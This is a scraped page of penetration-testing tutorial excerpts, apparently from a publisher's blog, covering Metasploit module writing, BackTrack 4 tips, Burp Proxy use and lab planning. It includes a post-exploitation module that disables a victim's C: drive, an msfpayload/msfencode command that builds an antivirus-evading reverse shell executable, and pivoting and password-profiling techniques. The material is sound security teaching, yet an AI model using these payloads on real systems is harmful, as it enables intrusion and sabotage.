#{os_info}") end end The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The result fetched will be stored into the variable named res. We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in the header of the response; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it with a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter. Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but will look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response code or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables. Let's see what output we'll get after running this module: Msf auxiliary(http_myscan) > run [*]192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Writing out post-exploitation modules Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target compromises successfully. So, let's begin with a simple drive disabler module which will disable C: at the target system: require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry def initialize super( 'Name' => 'Drive Disabler Module', 'Description' => 'C Drive Disabler Module', 'License' => MSF_LICENSE, 'Author' => 'Nipun Jaswal' ) End We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define necessary information about the module in the initialize method just as we did for the previous modules. Let's see the remaining part of the module: def run key1="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" print_line("Disabling C Drive") meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD') print_line("Setting No Drives For C") meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD') print_line("Removing View On The Drive") print_line("Disabled C Drive") end end #class We created a variable called key1, and we stored the path of the registry where we need to create values to disable the drives in it. As we are in a meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setval function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation will create a new registry key named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula, 2^([drive character serial number]-1) . Suppose, we need to disable the C drive. We know that character C is the third character in alphabets. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows: 2^ (3-1) = 2^2= 4 Therefore, the bitmask is 4 for disabling C:. We also created another key, NoViewOnDrives, to disable the view of these drives with the exact same parameters. Now, when we run this module, it gives the following output: So, let's see whether we have successfully disabled C: or not: Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our need. I recommend you put some extra time toward the libraries of Metasploit. Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER, because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.
Read more
  • 0
  • 0
  • 8054

article-image-tips-and-tricks-backtrack-4
Packt
26 May 2011
7 min read
Save for later

Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
  BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Read more about this book       (For more resources on this subject, see here.) Updating the kernel The update process is enough for updating the software applications. However, sometimes you may want to update your kernel, because your existing kernel doesn't support your new device. Please remember that because the kernel is the heart of the operating system, failure to upgrade may cause your BackTrack to be unbootable. You need to make a backup of your kernel and configuration. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to the BackTrack users and updating with other kernel versions could disable those features.   Multiple Customized installations One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (300MB to download) after you've installed it from the ISO or from the VMWare image provided. If you have one machine and a high speed Internet connection, there's nothing much to worry about. However, imagine installing BackTrack 4 in several machines, in several locations, with a slow internet connection. The solution to this problem is by creating an ISO image with all the upgrades already installed. If you want to install BackTrack 4, you can just install it from the newly created ISO image. You won't have to download the big upgrade again. While for the VMWare image, you can solve the problem by doing the upgrade in the virtual image, then copying that updated virtual image to be used in the new VMWare installation.   Efficient methodology Combining the power of both methodologies, Open Source Security Testing Methodology Manual (OSSTMM) and Information Systems Security Assessment Framework (ISSAF) does provide sufficient knowledge base to assess the security of an enterprise environment efficiently.   Can't find the dnsmap program In our testing, the dnsmap-bulk script is not working because it can't find the dnsmap program. To fix it, you need to define the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap). Edit the dnsmap-bulk.sh file using nano text editor and change the following: dnsmap $i elif [[ $# -eq 2 ]] then dnsmap $i -r $2 to ./dnsmap $i elif [[ $# -eq 2 ]] then ./dnsmap $i -r $2 and save your changes.   fierce Version Currently, the fierce Version 1 included with BackTrack 4 is no longer maintained by the author (Rsnake). He has suggested using fierce Version 2 that is still actively maintained by Jabra. fierce Version 2 is a rewrite of fierce Version 1. It also has several new features such as virtual host detection, subdomain and extension bruteforcing, template based output system, and XML support to integrate with Nmap. Since fierce Version 2 is not released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion check out command: #svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/ Make sure you are in the /pentest/enumeration directory first before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.   Relationship between "Vulnerability" and "Exploit" A vulnerability is a security weakness found in the system which can be used by the attacker to perform unauthorized operations, while the exploit is a piece of code (proof-of-concept or PoC) written to take advantage of that vulnerability or bug in an automated fashion.   CISCO Privilege modes There are 16 different privilege modes available for the Cisco devices, ranging from 0 (most restricted level) to 15 (least restricted level). All the accounts created should have been configured to work under the specific privilege level. More information on this is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.   Cisco Passwd Scanner The Cisco Passwd Scanner has been developed to scan the whole bunch of IP addresses in a specific network class. This class can be represented as A, B, or C in terms of network computing. Each class has it own definition for a number of hosts to be scanned. The tool is much faster and efficient in handling multiple threads in a single instance. It discovers those Cisco devices carrying default telnet password "cisco". We have found a number of Cisco devices vulnerable to default telnet password "cisco".   Common User Passwords Profiler (CUPP) As a professional penetration tester you may find a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials due to certain variable conditions, such as, the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. This all comes to guessing and breaking the password based on various password cracking techniques (dictionary or brute force method). CUPP is purely designed to generate a list of common passwords by profiling the target name, birthday, nickname, family member's information, pet name, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This activity serves as crucial input to the dictionary-based attack method while attempting to crack the target's e-mail account password.   Extract particular information from the exploits list Using the power of bash commands we can manipulate the output of any text file in order to retrieve meaningful data. This can be accomplished by typing in cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv. To learn the basic shell commands please refer to an online source at: http://tldp.org/LDP/abs/html/index.html.   "inline" and "stager" type payload An inline payload is a single self-contained shell code that is to be executed with one instance of an exploit. While the stager payload creates a communication channel between the attacker and victim machine to read-off the rest of the staging shell code to perform the specific task, it is often common practice to choose stager payloads because they are much smaller in size than inline payloads.   Extending attack landscape by gaining deeper access to the target's network that is inaccessible from outside Metasploit provides a capability to view and add new routes to the destination network using the "route add targetSubnet targetSubnetMask SessionId" command (for example, route add 10.2.4.0 255.255.255.0 1). The "SessionId" is pointing to the existing meterpreter session (also called gateway) created after successful exploitation. The "targetSubnet" is another network address (also called dual homed Ethernet IP-address) attached to our compromised host. Once you set a metasploit to route all the traffic through a compromised host session, we are then ready to penetrate further into a network which is normally non-routable from our side. This terminology is commonly known as Pivoting or Foot-holding.   Evading Antivirus Protection Using Metasploit Using a tool called msfencode located at /pentest/exploits/framework3, we can generate a self-protected executable file with encoded payload. This should be parallel to the msfpayload file generation process. A "raw" output from Msfpayload will be piped into Msfencode to use specific encoding technique before outputting the final binary. For instance, execute ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe to generate an encoded version of a reverse shell executable file. We strongly suggest you to use the "stager" type payloads instead of "inline" payloads, as they have a greater probability of success in bypassing major malware defenses due to their indefinite code signatures.   Stunnel version 3 BackTrack also comes with Stunnel version 3. The difference with Stunnel version 4 is that the version 4 uses a configuration file. If you want to run the version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments. Summary In this article we will take a look at some tips and tricks to make the best use of BackTrack OS. Further resources on this subject: FAQs on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 7840
Packt
03 Sep 2013
11 min read
Save for later

Quick start – Using Burp Proxy

Packt
03 Sep 2013
11 min read
(For more resources related to this topic, see here.) At the top of Burp Proxy, you will notice the following three tabs: intercept: HTTP requests and responses that are in transit can be inspected and modified from this window options: Proxy configurations and advanced preferences can be tuned from this window history: All intercepted traffic can be quickly analyzed from this window If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, represents a compact reference. Step 1 – Intercepting web requests After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website: In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. This should be marked as intercept is on. In the browser, type http://www.packtpub.com/ in the URL bar and press Enter. Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy waiting for the user to either forward or stop it. For instance, press forward and return to the browser. You should see the home page of Packt Publishing as you would normally interact with the website. Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. We have dropped the request, thus Burp Proxy did not forward the request to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp, instead of the original HTML content. Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important functionality as it allows you to import the current web request in any of the other Burp tools. You can already imagine the potentialities of having a set of integrated tools that allow you to manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder. Burp Proxy In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit. Also, Burp Proxy allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section from within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities as we are generally interested in evaluating the server's responses for all tampered requests. Or else, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK). Step 2 – Inspecting web requests Once a request is properly intercepted, it is possible to inspect the entire content, headers, and parameters, using one of the four Burp Proxy message analysis tabs: raw: This view allows you to display the web request in raw format within a simple text editor. This is a very handy visualization as it enables maximum flexibility for further changing the content. params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in case of complex requests as it allows to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON. headers: Similarly, this view displays the HTTP header names and values in tabular form. hex: In case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view allows to display a request as in a traditional hex editor. The history tab enables you to analyze all web requests transited through the proxy: Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version. Displaying HTTP requests and responses intercepted by Burp Proxy By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons Back in the history tab, Burp Proxy displays several details for each item including the request method, URL, response's code, and length. Each request is uniquely identified by a number, visible in the left-hand side column. Click on the request identifier. Burp Proxy allows you to set a color for that specific item. This is extremely helpful to highlight important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior. Click on the display filter, at the top of the history list to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection. At this point, you may have already understood the potentialities of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses as you can filter relevant traffic only by using regular expressions or simply matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages. Step 3 – Tampering web requests As part of a typical security assessment, you will need to modify HTTP requests and analyze the web application responses. For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) in all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge on common web application vulnerabilities, the OWASP Top Ten Project article at https://www. owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point. Tampering web requests with Burp is as easy as editing strings in a text editor: Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP. Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request. From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the the GET parameter's keys value from ASP to PHP. Edit the request to look like the following: GET /books/all?keys=PHP HTTP/1.1Host: www.packtpub.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0)Gecko/20100101 Firefox/15.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflateProxy-Connection: keep-alive Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page. Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy view. For example, in the params view, it is possible to add a new parameter by following these steps: Clicking on new (right side), from the Burp Proxy params view. Selecting the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters. Typing the name and the value of the newly created parameter. Advanced features After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations. Match and replace Let's imagine that you are testing an application designed for mobile devices using a standard browser from your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and respond with customized resources that better fit mobile phones and tablets. Under these circumstances, you will particularly find the match and replace function, provided by Burp Proxy, very useful. Let's configure Burp Proxy in order to tamper the user-agent HTTP header field: In the options tab of Burp Proxy, scroll down to the match and replace section. Under the match and replace table, a drop-down list and two text fields allow to create a customized rule. Select request header from the drop-down list since we want to create a match condition pertaining to HTTP requests. Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart. html. In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3 or any other fake user-agent that you want to impersonate. Click add and verify that the new match has been added to the list; this button is shown here: Burp Proxy match and replace list Intercept a request, leave it to pass through the proxy, and verify that it has been automatically modified by the tool. Automatically modified HTTP header in Burp Proxy HTML modification Another interesting feature of Burp Proxy is the automatic HTML modification, that can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you would need to tamper the request with invalid data. In these situations, you can either manually tamper the request in the proxy or enable HTML modification to remove any client-side validation and use the browser in order to submit invalid data. This function can be also used to display hidden form fields. Let's see in practice how you can activate this feature: In Burp Proxy, go to options, scroll down to the HTML modification section. Numerous options are available in this section: unhide hidden form fields to display hidden HTML form fields, enable disabled form fields to submit all input forms present inside the HTML page, remove input field length limits to allow extra-long strings in the text fields, remove JavaScript form validation to make Burp Proxy all onsubmit handler JavaScript functions from HTML forms, remove all JavaScript to completely remove all JS scripts and remove object tags to remove embedded objects within the HTML document. Select the desired checkboxes to activate automatic HTML modification. Summary Using this feature, you will be able to understand whether the web application enforces server- side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser. Resources for Article : Further resources on this subject: Visual Studio 2010 Test Types [Article] Ordered and Generic Tests in Visual Studio 2010 [Article] Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]  
Read more
  • 0
  • 0
  • 7779

article-image-planning-lab-environment
Packt
12 Apr 2013
10 min read
Save for later

Planning the lab environment

Packt
12 Apr 2013
10 min read
(For more resources related to this topic, see here.) Getting ready To get the best result after setting up your lab, you should plan it properly at first. Your lab will be used to practise certain penetration testing skills. Therefore, in order to properly plan your lab environment, you should first consider which skills you want to practise. Although you could also have non-common or even unique reasons to build a lab, I can provide you with the average list of skills one might need to practice: Essential skills Discovery techniques Enumeration techniques Scanning techniques Network vulnerability exploitation Privilege escalation OWASP TOP 10 vulnerabilities discovery and exploitation Password and hash attacks Wireless attacks Additional skills Modifying and testing exploits Tunneling Fuzzing Vulnerability research Documenting the penetration testing process All these skills are applied in real-life penetration testing projects, depending on its depth and the penetration tester's qualifications. The following skills could be practised at three lab types or their combinations: Network security lab Web application lab Wi-Fi lab I should mention that the lab planning process for each of the three lab types listed consists of the same four phases: Determining the lab environment requirements: This phase helps you to actually understand what your lab should include. In this phase, all the necessary lab environment components should be listed and their importance for practising different penetration testing skills should be assessed. Determining the lab environment size: The number of various lab environment components should be defined in this phase. Determining the required resources: The point of this phase is to choose which hardware and software could be used for building the lab with the specified parameters and fit it with what you actually have or are able to get. Determining the lab environment architecture: This phase designs the network topology and network address space How to do it... Now, I want to describe step by step how to plan a common lab combined of all three lab types listed in the preceding section using the following four-phase approach: Determine the lab environment requirements: To fit our goal and practise particular skills, the lab should contain the following components: Skills to practice Necessary components Discovery techniques Several different hosts with various OSs Firewall IPS Enumeration techniques Scanning techniques Network vulnerability exploitation OWASP TOP 10 vulnerabilities discovery and exploitation Web server Web application Database server Web Application Firewall Password and hash attacks Workstations Servers Domain controller FTP server Wireless attacks Wireless router Radius server Laptop or any other host with Wi-Fi adapter Modifying and testing exploits Any host Vulnerable network service Debugger Privilege escalation Any host Tunnelling Several hosts Fuzzing Any host Vulnerable network service Debugger Vulnerability research Documenting the penetration testing process Specialized software Now, we can make our component list and define the importance of each component for our lab (importance ranges between less important, Additional, and most important, Essential): Components Importance Windows server Essential Linux server Important FreeBSD server Additional Domain controller Important Web server Essential FTP Server Important Web site Essential Web 2.0 application Important Web Application Firewall Additional Database server Essential Windows workstation Essential Linux workstation Additional Laptop or any other host with Wi-Fi adapter Essential Wireless router Essential Radius server Important Firewall Important IPS Additional Debugger Additional Determine the lab environment size: In this step, we should decide how many instances of each component we need in our lab. We will count only the essential and important components' numbers, so let's exclude all additional components. This means that we've now got the following numbers: Components Number Windows server 2 Linux server 1 Domain controller 1 Web server 1 FTP Server 1 Web site 1 Web 2.0 application 1 Database server 1 Windows workstation 2 Host with Wi-Fi adapter 2 Wireless router 1 Radius server 1 Firewall 2 Determine required resources: Now, we will discuss the required resources: Server and victim workstations will be virtual machines based on VMWare Workstation 8.0. To run the virtual machines without any trouble, you will need to have an appropriate hardware platform based on a CPU with two or more cores and at least 4 GB RAM. Windows servers OSs will work under Microsoft Windows 2008 Server and Microsoft Windows Server 2003. We will use Ubuntu 12.04 LTS as a Linux server OS. Workstations will work under Microsoft Windows XP SP3 and Microsoft Windows 7. ASUS WL-520gc will be used as the LAN and WLAN router. Any laptop as the attacker's host. Samsung Galaxy Tab as the Wi-Fi victim (or other device supporting Wi-Fi). We will use free software as a web server, an FTP-server, and a web application, so there is no need for any hardware or financial resources to get these requirements. Determine the lab environment architecture: Now, we need to design our lab network and draw a scheme: Address space parameters DHCP server: 192.168.1.1 Gateway: 192.168.1.1 Address pool: 192.168.1.2-15 Subnet mask: 255.255.255.0 How it works... In the first step, we discovered which types of lab components we need by determining what could be used to practise the following skills: All OSs and network services are suitable for practicing discovery, enumeration, and scanning techniques and also for network vulnerability exploitation. We also need at least two firewalls – windows built-in software and router built-in firewall functions. Firewalls are necessary for learning different scanning techniques and firewall rules detection knowledge. Additionally, you can use any IPS for practicing evasion techniques. A web server, a website, and a web application are necessary for learning how to disclose and exploit OWASP TOP 10 vulnerabilities. Though a Web Application Firewall (WAF) is not necessary, it helps to improve web penetration testing skills to higher level. An FTP service ideally fits to practice password brute-forcing. Microsoft domain services are necessary to understand and try Windows domain passwords and hash attacks including relaying. This is why we need at least one network service with remote password authentication and at least one Windows domain controller with two Windows workstations. A wireless access point is essential for performing various wireless attacks, but it is better to combine LAN router and Wi-Fi access point in one device. So, we will use Wi-Fi router with several LAN ports. A radius server is necessary for practicing attacks on WLAN with WPA-Enterprise security. A Laptop and a tablet PC with any Wi-Fi adapters will work as an attacker, and victim in wireless attacks. Tunnelling techniques could be practiced at any two hosts; it does not matter whether we use Windows or any other OS. Testing and modifying exploits as well as fuzzing and vulnerability research need a debugger installed on a vulnerable host. To properly document a penetration testing process, one can use just any test processor software, but there are several specialized software solutions, which make a thing much more comfortable and easier. In the second step, we determined which software and hardware we can use as instances of chosen component types and set their importance based on a common lab for a basic and intermediate professional level penetration tester. In the third step, we understood which solutions will be suitable for our tasks and what we can afford. I have tried to choose a cheaper option, which is why I am going to use virtualization software. The ASUS WL-520gc router combines the LAN router and Wi-Fi access point in the same device, so it is cheaper and more comfortable than using dedicated devices. A laptop and a tablet PC are also chosen for practising wireless attacks, but it is not the cheapest solution. In the fourth step, we designed our lab network based on determined resources. We have chosen to put all the hosts in the same subnet to set up the lab in an easier way. The subnet has its own DHCP server to dynamically assign network addresses to hosts. There's more... Let me give you an account of alternative ways to plan the lab environment details. Lab environment components variations It is not necessary to use a laptop as the attacker machine and a tablet PC as the victim – you just need two PCs with connected Wi-Fi adapters to perform various wireless attacks. As an alternative to virtual machines, a laptop, and a tablet PC or old unused computers (if you have them) could also be used to work as hardware hosts. There is only one condition – their hardware resources should be enough for planned OSs to work. An IPS could be either a software or hardware, but hardware systems are more expensive. For our needs, it is enough to use any freeware Internet security software including both the firewall and IPS functionality. It is not essential to choose the same OS as I have chosen in this chapter; you can use any other OSs that support the required functionality. The same is true about network services – it is not necessary to use an FTP service; you can use any other service that supports network password authentication such as telnet and SSH. You will have to additionally install any debugger on one of the victim's workstations in order to test the new or modified exploits and perform vulnerability research, if you need to. Finally, you can use any other hardware or virtual router that supports LAN routing and Wi-Fi access point functionality. A connected, dedicated LAN router and Wi-Fi access point are also suitable for the lab. Choosing virtualization solutions – pros and cons Here, I want to list some pros and cons of the different virtualization solutions in table format: Solution Pros Cons VMWare ESXi Enterprise solution Powerful solution Easily supports a lot of virtual machines on the same physical server as separate partitions No need to install the OS Very high cost Requires a powerful server Requires processor virtualization support VMWare workstation Comfortable to work with User friendly GUI Easy install Virtual *nix systems work fast Better works with virtual graphics Shareware It sometimes faces problems with USB Wi-Fi adapters on Windows 7 Demanding towards system resources Does not support 64-bit guest OS Virtual Windows systems work slowly VMWare player Freeware User-friendly GUI Easy to install Cannot create new virtual machines Poor functionality Micrisoft Virtual PC Freeware Great compatibility and stability with Microsoft systems Good USB support Easy to install Works only on Windows and only with Windows Does not support a lot of features that concurrent solutions do Oracle Virtual Box Freeware Virtual Windows systems work fast User-friendly GUI Easy to install Works on Mac OS and Solaris as well as on Windows and Linux Supports the "Teleportation" technology Paid USB support; Virtual *nix systems work slowly Here, I have listed only the leaders of the virtualization market in my opinion. Historically, I am mostly accustomed to VMWare Workstation, but of course, you can choose any other solutions that you may like. You can find more comparison info at http://virt.kernelnewbies.org/TechComparison. Summary This article explained how you can plan your lab environment. Resources for Article : Further resources on this subject: FAQs on BackTrack 4 [Article] CISSP: Vulnerability and Penetration Testing for Access Control [Article] BackTrack 4: Target Scoping [Article]
Read more
  • 0
  • 0
  • 7726
Modal Close icon
Modal Close icon